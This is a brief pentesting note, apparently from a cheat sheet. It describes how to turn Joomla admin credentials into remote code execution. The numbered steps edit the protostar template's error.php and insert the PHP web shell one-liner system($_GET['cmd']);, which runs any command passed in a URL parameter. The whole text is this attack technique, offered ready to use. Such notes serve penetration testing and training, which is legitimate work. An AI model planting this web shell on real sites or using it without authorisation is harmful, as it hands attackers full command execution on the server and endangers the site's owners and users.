Joomla

If you managed to get admin credentials you can RCE inside of it by adding a snippet of PHP code to gain RCE. We can do this by customizing a template.

  1. Click on Templates on the bottom left under Configuration to pull up the templates menu.
  2. Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.
  3. Finally, you can click on a page to pull up the page source. Let's choose the error.php page. We'll add a PHP one-liner to gain code execution as follows:
    1. system($_GET['cmd']);
  4. Save & Close